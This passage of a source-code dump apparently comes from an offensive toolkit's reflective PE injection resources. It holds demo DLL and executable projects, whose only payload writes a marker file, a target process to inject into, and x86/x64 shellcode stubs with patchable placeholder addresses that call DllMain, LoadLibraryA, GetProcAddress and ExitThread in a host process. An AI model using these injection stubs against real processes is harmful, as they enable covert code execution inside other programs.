31 | will be produced, or you can set the Ignore Input Library property to Yes
32 | on the General property page of the Linker folder in the project's Property
33 | Pages dialog box.
34 |
35 | /////////////////////////////////////////////////////////////////////////////
36 | Other standard files:
37 |
38 | StdAfx.h, StdAfx.cpp
39 | These files are used to build a precompiled header (PCH) file
40 | named DemoDLL_RemoteProcess.pch and a precompiled types file named StdAfx.obj.
41 |
42 | /////////////////////////////////////////////////////////////////////////////
43 | Other notes:
44 |
45 | AppWizard uses "TODO:" comments to indicate parts of the source code you
46 | should add to or customize.
47 |
48 | /////////////////////////////////////////////////////////////////////////////
49 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/dllmain.cpp:
--------------------------------------------------------------------------------
1 | // dllmain.cpp : Defines the entry point for the DLL application.
2 | #include "stdafx.h"
3 |
4 | using namespace std;
5 |
// DLL entry point for the remote-process demo. Only process attach does any
// work: it drops a marker file on a fixed path so a test harness can confirm
// the entry point ran. Thread attach/detach and process detach are accepted
// without action.
//
// Params: hModule            - this DLL's module handle (unused)
//         ul_reason_for_call - DLL_PROCESS_ATTACH / DLL_THREAD_ATTACH /
//                              DLL_THREAD_DETACH / DLL_PROCESS_DETACH
//         lpReserved         - loader-reserved pointer (unused)
// Returns: TRUE, so the load is never refused.
// Side effects (attach only): creates c:\ReflectiveLoaderTest (the _mkdir
//         result is ignored, as in the original) and writes DllMain.txt
//         inside it. Open failures are silent.
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved)
{
    (void)hModule;
    (void)lpReserved;

    if (ul_reason_for_call == DLL_PROCESS_ATTACH)
    {
        _mkdir("c:\\ReflectiveLoaderTest");

        // Constructor opens the file; it is closed when marker leaves scope.
        std::ofstream marker("c:\\ReflectiveLoaderTest\\DllMain.txt");
        marker << "DllMain successfully called.\n";
    }

    return TRUE;
}
28 |
29 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // DemoDLL_RemoteProcess.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 |
8 | #include "targetver.h"
9 |
10 | #define WIN32_LEAN_AND_MEAN // Exclude rarely-used stuff from Windows headers
11 | // Windows Header Files:
12 | #include
13 | #include
14 | #include
15 | #include
16 | #include
17 |
18 |
19 | // TODO: reference additional headers your program requires here
20 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL_RemoteProcess/DemoDLL_RemoteProcess/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 |
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 |
8 | #include
9 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 2012
4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DemoExe_MD", "DemoExe_MD\DemoExe_MD.vcxproj", "{F674A5CE-F75F-4035-90AB-46DEBC670282}"
5 | EndProject
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DemoExe_MDd", "DemoExe_MDd\DemoExe_MDd.vcxproj", "{18FA8A49-4663-4FD8-9F0B-BD489A385A7B}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|Win32 = Debug|Win32
11 | Debug|x64 = Debug|x64
12 | Release|Win32 = Release|Win32
13 | Release|x64 = Release|x64
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {F674A5CE-F75F-4035-90AB-46DEBC670282}.Debug|Win32.ActiveCfg = Debug|Win32
17 | {F674A5CE-F75F-4035-90AB-46DEBC670282}.Debug|Win32.Build.0 = Debug|Win32
18 | {F674A5CE-F75F-4035-90AB-46DEBC670282}.Debug|x64.ActiveCfg = Debug|x64
19 | {F674A5CE-F75F-4035-90AB-46DEBC670282}.Debug|x64.Build.0 = Debug|x64
20 | {F674A5CE-F75F-4035-90AB-46DEBC670282}.Release|Win32.ActiveCfg = Release|Win32
21 | {F674A5CE-F75F-4035-90AB-46DEBC670282}.Release|Win32.Build.0 = Release|Win32
22 | {F674A5CE-F75F-4035-90AB-46DEBC670282}.Release|x64.ActiveCfg = Release|x64
23 | {F674A5CE-F75F-4035-90AB-46DEBC670282}.Release|x64.Build.0 = Release|x64
24 | {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Debug|Win32.ActiveCfg = Debug|Win32
25 | {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Debug|Win32.Build.0 = Debug|Win32
26 | {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Debug|x64.ActiveCfg = Debug|x64
27 | {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Debug|x64.Build.0 = Debug|x64
28 | {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Release|Win32.ActiveCfg = Release|Win32
29 | {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Release|Win32.Build.0 = Release|Win32
30 | {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Release|x64.ActiveCfg = Release|x64
31 | {18FA8A49-4663-4FD8-9F0B-BD489A385A7B}.Release|x64.Build.0 = Release|x64
32 | EndGlobalSection
33 | GlobalSection(SolutionProperties) = preSolution
34 | HideSolutionNode = FALSE
35 | EndGlobalSection
36 | EndGlobal
37 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/DemoExe_MD.cpp:
--------------------------------------------------------------------------------
1 | // DemoExe.cpp : Defines the entry point for the console application.
2 | //
3 |
4 | #include "stdafx.h"
5 | #include
6 |
7 | using namespace std;
8 |
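/*
 * Entry point of the demo executable (MSVC TCHAR build: _tmain/_TCHAR).
 * It only reports how it was invoked: prints argc, the address of argv and
 * each argument, then returns 0.
 *
 * argc - number of command-line arguments
 * argv - argument vector; element type follows the build's _TCHAR
 * returns 0 after printing
 */
int _tmain(int argc, _TCHAR* argv[])
{
    printf("Exe loaded! Printing argc and argv\n\n");

    printf("Argc: %d\n", argc);
    // %p is the conversion for a pointer; the previous %d read an int, which is
    // undefined behaviour and shows a truncated value on x64.
    printf("ArgvAddress: %p\n", (void*)argv);

    for (int i = 0; i < argc; i++)
    {
        // In MSVC's wprintf, %s expects a wide string, so this matches argv[i]
        // only when _TCHAR is wchar_t (Unicode build).
        // NOTE(review): the build configuration is not visible here - confirm.
        wprintf(L"Argv: %s\n", argv[i]);
    }

    printf("Exiting exe\n");

    return 0;
}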
25 |
26 |
27 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/DemoExe_MD.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 |
29 |
30 | Source Files
31 |
32 |
33 | Source Files
34 |
35 |
36 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/ReadMe.txt:
--------------------------------------------------------------------------------
1 | ========================================================================
2 | CONSOLE APPLICATION : DemoExe_MD Project Overview
3 | ========================================================================
4 |
5 | AppWizard has created this DemoExe_MD application for you.
6 |
7 | This file contains a summary of what you will find in each of the files that
8 | make up your DemoExe_MD application.
9 |
10 |
11 | DemoExe_MD.vcxproj
12 | This is the main project file for VC++ projects generated using an Application Wizard.
13 | It contains information about the version of Visual C++ that generated the file, and
14 | information about the platforms, configurations, and project features selected with the
15 | Application Wizard.
16 |
17 | DemoExe_MD.vcxproj.filters
18 | This is the filters file for VC++ projects generated using an Application Wizard.
19 | It contains information about the association between the files in your project
20 | and the filters. This association is used in the IDE to show grouping of files with
21 | similar extensions under a specific node (e.g. ".cpp" files are associated with the
22 | "Source Files" filter).
23 |
24 | DemoExe_MD.cpp
25 | This is the main application source file.
26 |
27 | /////////////////////////////////////////////////////////////////////////////
28 | Other standard files:
29 |
30 | StdAfx.h, StdAfx.cpp
31 | These files are used to build a precompiled header (PCH) file
32 | named DemoExe_MD.pch and a precompiled types file named StdAfx.obj.
33 |
34 | /////////////////////////////////////////////////////////////////////////////
35 | Other notes:
36 |
37 | AppWizard uses "TODO:" comments to indicate parts of the source code you
38 | should add to or customize.
39 |
40 | /////////////////////////////////////////////////////////////////////////////
41 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // DemoExe_MD.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 |
8 | #include "targetver.h"
9 |
10 | #include
11 | #include
12 |
13 |
14 |
15 | // TODO: reference additional headers your program requires here
16 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MD/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 |
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 |
8 | #include
9 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/DemoExe_MDd.cpp:
--------------------------------------------------------------------------------
1 | // DemoExe.cpp : Defines the entry point for the console application.
2 | //
3 |
4 | #include "stdafx.h"
5 | #include
6 |
7 | using namespace std;
8 |
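/*
 * Entry point of the demo executable (MSVC TCHAR build: _tmain/_TCHAR).
 * It only reports how it was invoked: prints argc, the address of argv and
 * each argument, then returns 0.
 *
 * argc - number of command-line arguments
 * argv - argument vector; element type follows the build's _TCHAR
 * returns 0 after printing
 */
int _tmain(int argc, _TCHAR* argv[])
{
    printf("Exe loaded! Printing argc and argv\n\n");

    printf("Argc: %d\n", argc);
    // %p is the conversion for a pointer; the previous %d read an int, which is
    // undefined behaviour and shows a truncated value on x64.
    printf("ArgvAddress: %p\n", (void*)argv);

    for (int i = 0; i < argc; i++)
    {
        // In MSVC's wprintf, %s expects a wide string, so this matches argv[i]
        // only when _TCHAR is wchar_t (Unicode build).
        // NOTE(review): the build configuration is not visible here - confirm.
        wprintf(L"Argv: %s\n", argv[i]);
    }

    printf("Exiting exe\n");

    return 0;
}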
25 |
26 |
27 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/DemoExe_MDd.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 |
29 |
30 | Source Files
31 |
32 |
33 | Source Files
34 |
35 |
36 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/ReadMe.txt:
--------------------------------------------------------------------------------
1 | ========================================================================
2 | CONSOLE APPLICATION : DemoExe_MDd Project Overview
3 | ========================================================================
4 |
5 | AppWizard has created this DemoExe_MDd application for you.
6 |
7 | This file contains a summary of what you will find in each of the files that
8 | make up your DemoExe_MDd application.
9 |
10 |
11 | DemoExe_MDd.vcxproj
12 | This is the main project file for VC++ projects generated using an Application Wizard.
13 | It contains information about the version of Visual C++ that generated the file, and
14 | information about the platforms, configurations, and project features selected with the
15 | Application Wizard.
16 |
17 | DemoExe_MDd.vcxproj.filters
18 | This is the filters file for VC++ projects generated using an Application Wizard.
19 | It contains information about the association between the files in your project
20 | and the filters. This association is used in the IDE to show grouping of files with
21 | similar extensions under a specific node (e.g. ".cpp" files are associated with the
22 | "Source Files" filter).
23 |
24 | DemoExe_MDd.cpp
25 | This is the main application source file.
26 |
27 | /////////////////////////////////////////////////////////////////////////////
28 | Other standard files:
29 |
30 | StdAfx.h, StdAfx.cpp
31 | These files are used to build a precompiled header (PCH) file
32 | named DemoExe_MDd.pch and a precompiled types file named StdAfx.obj.
33 |
34 | /////////////////////////////////////////////////////////////////////////////
35 | Other notes:
36 |
37 | AppWizard uses "TODO:" comments to indicate parts of the source code you
38 | should add to or customize.
39 |
40 | /////////////////////////////////////////////////////////////////////////////
41 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // DemoExe_MDd.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 |
8 | #include "targetver.h"
9 |
10 | #include
11 | #include
12 |
13 |
14 |
15 | // TODO: reference additional headers your program requires here
16 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoExe/DemoExe_MDd/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 |
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 |
8 | #include
9 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 2012
4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ExeToInjectInTo", "ExeToInjectInTo\ExeToInjectInTo.vcxproj", "{B9FD99EA-9BD2-4A39-A367-C16B680B41F3}"
5 | EndProject
6 | Global
7 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
8 | Debug|Win32 = Debug|Win32
9 | Release|Win32 = Release|Win32
10 | EndGlobalSection
11 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
12 | {B9FD99EA-9BD2-4A39-A367-C16B680B41F3}.Debug|Win32.ActiveCfg = Debug|Win32
13 | {B9FD99EA-9BD2-4A39-A367-C16B680B41F3}.Debug|Win32.Build.0 = Debug|Win32
14 | {B9FD99EA-9BD2-4A39-A367-C16B680B41F3}.Release|Win32.ActiveCfg = Release|Win32
15 | {B9FD99EA-9BD2-4A39-A367-C16B680B41F3}.Release|Win32.Build.0 = Release|Win32
16 | EndGlobalSection
17 | GlobalSection(SolutionProperties) = preSolution
18 | HideSolutionNode = FALSE
19 | EndGlobalSection
20 | EndGlobal
21 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/ExeToInjectInTo.cpp:
--------------------------------------------------------------------------------
1 | // ExeToInjectInTo.cpp : Defines the entry point for the console application.
2 | //
3 |
4 | #include "stdafx.h"
5 | #include
6 |
7 | using namespace std;
8 |
/*
 * Entry point of the host process used by the injection demo. It prints a
 * prompt, blocks until a byte (normally the Enter key) arrives on stdin, and
 * then exits with status 0, so the process stays alive only while it waits.
 *
 * argc, argv - unused
 * returns 0
 */
int _tmain(int argc, _TCHAR* argv[])
{
    // The prompt contains no conversions, so an unformatted write is enough.
    fputs("Press enter to close.\n", stdout);
    // Wait for input; the byte read is irrelevant.
    (void)getchar();
    return 0;
}
16 |
17 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/ExeToInjectInTo.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hpp;hxx;hm;inl;inc;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 | Header Files
23 |
24 |
25 | Header Files
26 |
27 |
28 |
29 |
30 | Source Files
31 |
32 |
33 | Source Files
34 |
35 |
36 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/ReadMe.txt:
--------------------------------------------------------------------------------
1 | ========================================================================
2 | CONSOLE APPLICATION : ExeToInjectInTo Project Overview
3 | ========================================================================
4 |
5 | AppWizard has created this ExeToInjectInTo application for you.
6 |
7 | This file contains a summary of what you will find in each of the files that
8 | make up your ExeToInjectInTo application.
9 |
10 |
11 | ExeToInjectInTo.vcxproj
12 | This is the main project file for VC++ projects generated using an Application Wizard.
13 | It contains information about the version of Visual C++ that generated the file, and
14 | information about the platforms, configurations, and project features selected with the
15 | Application Wizard.
16 |
17 | ExeToInjectInTo.vcxproj.filters
18 | This is the filters file for VC++ projects generated using an Application Wizard.
19 | It contains information about the association between the files in your project
20 | and the filters. This association is used in the IDE to show grouping of files with
21 | similar extensions under a specific node (e.g. ".cpp" files are associated with the
22 | "Source Files" filter).
23 |
24 | ExeToInjectInTo.cpp
25 | This is the main application source file.
26 |
27 | /////////////////////////////////////////////////////////////////////////////
28 | Other standard files:
29 |
30 | StdAfx.h, StdAfx.cpp
31 | These files are used to build a precompiled header (PCH) file
32 | named ExeToInjectInTo.pch and a precompiled types file named StdAfx.obj.
33 |
34 | /////////////////////////////////////////////////////////////////////////////
35 | Other notes:
36 |
37 | AppWizard uses "TODO:" comments to indicate parts of the source code you
38 | should add to or customize.
39 |
40 | /////////////////////////////////////////////////////////////////////////////
41 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // ExeToInjectInTo.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 |
5 | #include "stdafx.h"
6 |
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/stdafx.h:
--------------------------------------------------------------------------------
1 | // stdafx.h : include file for standard system include files,
2 | // or project specific include files that are used frequently, but
3 | // are changed infrequently
4 | //
5 |
6 | #pragma once
7 |
8 | #include "targetver.h"
9 |
10 | #include
11 | #include
12 |
13 |
14 |
15 | // TODO: reference additional headers your program requires here
16 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/ExeToInjectInTo/ExeToInjectInTo/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 |
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 |
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 |
8 | #include
9 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/readme.txt:
--------------------------------------------------------------------------------
1 | This contains the assembly code I used to build the shellcode the PowerShell script uses. Some of the assembly isn't included because I didn't save it; the missing pieces should just be the SUPER easy stuff like moving an address to EAX and returning.
2 |
3 | Compile:
4 | x64:
5 | nasm -f elf64 FileName.asm
6 | ld -o FileName FileName.o
7 | objdump -M intel -d FileName
8 |
9 | x86:
10 | nasm FileName.asm
11 | ld -o FileName FileName.o
12 | objdump -M intel -d FileName
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/CallDllMain.asm:
--------------------------------------------------------------------------------
1 | [SECTION .text] ; x64 stub that calls DllMain(hinstDLL, DLL_PROCESS_ATTACH, NULL); every 0x4141414141414141 immediate is a placeholder the PowerShell script overwrites before the stub is used
2 | global _start
3 |
4 | _start:
5 | ; Get stack setup: save rbx (callee-saved) and the entry rsp so both can be put back after the call
6 | push rbx
7 | mov rbx, rsp ; rbx keeps the rsp to restore
8 | and sp, 0xff00 ; clear the low 8 bits of rsp (rounds down to a 256-byte boundary, which also satisfies the 16-byte alignment the x64 ABI wants at a call); no separate shadow-space reservation is made here, unlike GetFuncAddress.asm and LoadLibraryA.asm
9 |
10 | ; Call DllMain -- x64 calling convention: first three integer arguments in rcx, rdx, r8
11 | mov rcx, 0x4141414141414141 ; DLLHandle, set by PowerShell (hinstDLL)
12 | mov rdx, 0x1 ; PROCESS_ATTACH (fdwReason = DLL_PROCESS_ATTACH)
13 | mov r8, 0x0 ; NULL (lpReserved)
14 | mov rax, 0x4141414141414141 ; Address of DllMain, set by PS
15 | call rax ; DllMain's BOOL result (rax) is not checked
16 |
17 | ; Fix stack: discard whatever the call left, then restore rbx
18 | mov rsp, rbx
19 | pop rbx
20 | ret ; back to whoever invoked the stub
21 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/ExitThread.asm:
--------------------------------------------------------------------------------
1 | [SECTION .text] ; x64 stub: set a byte flag that the PowerShell side reads, then call ExitThread so only the current thread ends rather than the host process; the 0x4141414141414141 immediates are placeholders patched by PS
2 |
3 | global _start
4 |
5 | _start:
6 | ; Set a var to 1, let PS know the exe is exiting
7 | mov rbx, 0x4141414141414141 ; address of the flag byte, set by PS
8 | mov [rbx], byte 0x01 ; flag = 1
9 |
10 | ; Call exitthread instead of exitprocess (ExitProcess would tear down the whole host process)
11 | sub rsp, 0xc0 ; move rsp down by 0xc0 bytes first ...
12 | and sp, 0xFFf0 ; Needed for stack alignment: ... then round down to a 16-byte boundary (x64 ABI)
13 | mov rbx, 0x4141414141414141 ; address of ExitThread, set by PS
14 | call rbx ; does not return; rcx (ExitThread's dwExitCode) is not set here, so the thread's exit code is whatever rcx held
15 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/GetFuncAddress.asm:
--------------------------------------------------------------------------------
1 | [SECTION .text] ; x64 stub: call GetProcAddress(hModule, lpProcName) and store the returned address in a buffer; every 0x4141414141414141 immediate is a placeholder patched by the PowerShell script
2 |
3 | global _start
4 |
5 | _start:
6 | ; Save state of rbx and stack (rbx is callee-saved; it keeps the entry rsp)
7 | push rbx
8 | mov rbx, rsp
9 |
10 | ; Set up stack for function call to GetProcAddress: 0x20 bytes of shadow space for the callee, then 64-byte alignment (also satisfies the 16-byte x64 ABI requirement)
11 | sub rsp, 0x20
12 | and sp, 0xffc0 ; clear the low 6 bits of rsp
13 |
14 | ; Call getprocaddress -- x64 calling convention: rcx = first argument, rdx = second
15 | mov rcx, 0x4141414141414141 ; DllHandle, set by PS (hModule)
16 | mov rdx, 0x4141414141414141 ; Ptr to FuncName string, set by PS (lpProcName, ANSI)
17 | mov rax, 0x4141414141414141 ; GetProcAddress address, set by PS
18 | call rax ; result (function address or NULL) comes back in rax
19 |
20 | ; Store the result (written unconditionally; a NULL result is stored as-is, the caller must check it)
21 | mov rcx, 0x4141414141414141 ; Ptr to buffer to save result,set by PS
22 | mov [rcx], rax ; 8-byte store
23 |
24 | ; Restore stack and rbx, then return to the invoker
25 | mov rsp, rbx
26 | pop rbx
27 | ret
28 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x64/LoadLibraryA.asm:
--------------------------------------------------------------------------------
1 | [SECTION .text] ; x64 stub: call LoadLibraryA(lpLibFileName) and store the returned module handle; every 0x4141414141414141 immediate is a placeholder patched by the PowerShell script
2 |
3 | global _start
4 |
5 | _start:
6 | ; Save rsp and setup stack for function call: rbx (callee-saved) keeps the entry rsp, then 0x20 bytes of shadow space and 64-byte alignment (satisfies the 16-byte x64 ABI requirement)
7 | push rbx
8 | mov rbx, rsp
9 | sub rsp, 0x20
10 | and sp, 0xffc0 ; clear the low 6 bits of rsp
11 |
12 | ; Call LoadLibraryA -- x64 calling convention: rcx = first argument; rdx is only a scratch register for the call target here
13 | mov rcx, 0x4141414141414141 ; Ptr to string of library, set by PS (ANSI path or name)
14 | mov rdx, 0x4141414141414141 ; Address of LoadLibrary, set by PS
15 | call rdx ; HMODULE (or NULL) comes back in rax
16 |
17 | mov rdx, 0x4141414141414141 ; Ptr to save result, set by PS
18 | mov [rdx], rax ; 8-byte store, written even when rax is NULL
19 |
20 | ; Fix stack: restore rsp and rbx, return to the invoker
21 | mov rsp, rbx
22 | pop rbx
23 | ret
24 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x86/CallDllMain.asm:
--------------------------------------------------------------------------------
1 | [SECTION .text] ; x86 stub that calls DllMain(hinstDLL, DLL_PROCESS_ATTACH, NULL); every 0x41414141 immediate is a placeholder the PowerShell script overwrites before the stub is used
2 | global _start
3 |
4 | _start:
5 | ; Get stack setup: save ebx (callee-saved) and the entry esp so both can be restored after the call
6 | push ebx
7 | mov ebx, esp ; ebx keeps the esp to restore
8 | and esp, 0xfffffff0 ; round esp down to a 16-byte boundary
9 |
10 | ; Call DllMain -- stdcall: arguments pushed right to left, callee pops them
11 | mov ecx, 0x41414141 ; DLLHandle, set by PowerShell (hinstDLL)
12 | mov edx, 0x1 ; PROCESS_ATTACH (fdwReason = DLL_PROCESS_ATTACH)
13 | mov eax, 0x0 ; NULL (lpReserved)
14 | push eax ; lpReserved (last argument, pushed first)
15 | push edx ; fdwReason
16 | push ecx ; hinstDLL (first argument, pushed last)
17 | mov eax, 0x41414141 ; Address of DllMain, set by PS
18 | call eax ; DllMain's BOOL result (eax) is not checked
19 |
20 | ; Fix stack: discard whatever the call left, then restore ebx
21 | mov esp, ebx
22 | pop ebx
23 | ret ; back to whoever invoked the stub
24 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x86/ExitThread.asm:
--------------------------------------------------------------------------------
1 | [SECTION .text] ; x86 stub: set a byte flag that the PowerShell side reads, then call ExitThread so only the current thread ends rather than the host process; the 0x41414141 immediates are placeholders patched by PS
2 | global _start
3 |
4 | _start:
5 | ; Set a var to 1, let PS know the EXE is exiting
6 | mov ebx, 0x41414141 ; address of the flag byte, set by PS
7 | mov [ebx], byte 0x01 ; flag = 1
8 |
9 | ; Call exitthread instead of exit process (ExitProcess would tear down the whole host process)
10 | sub esp, 0x20 ; move esp down by 0x20 bytes first ...
11 | and esp, 0xFFFFFFc0 ; Needed for stack alignment: ... then round down to a 64-byte boundary
12 | mov ebx, 0x41414141 ; address of ExitThread, set by PS
13 | call ebx ; does not return; nothing is pushed for ExitThread's dwExitCode (stdcall), so the exit code is whatever sits at the top of the stack
14 |
--------------------------------------------------------------------------------
/CodeExecution/Invoke-ReflectivePEInjection_Resources/Shellcode/x86/GetProcAddress.asm:
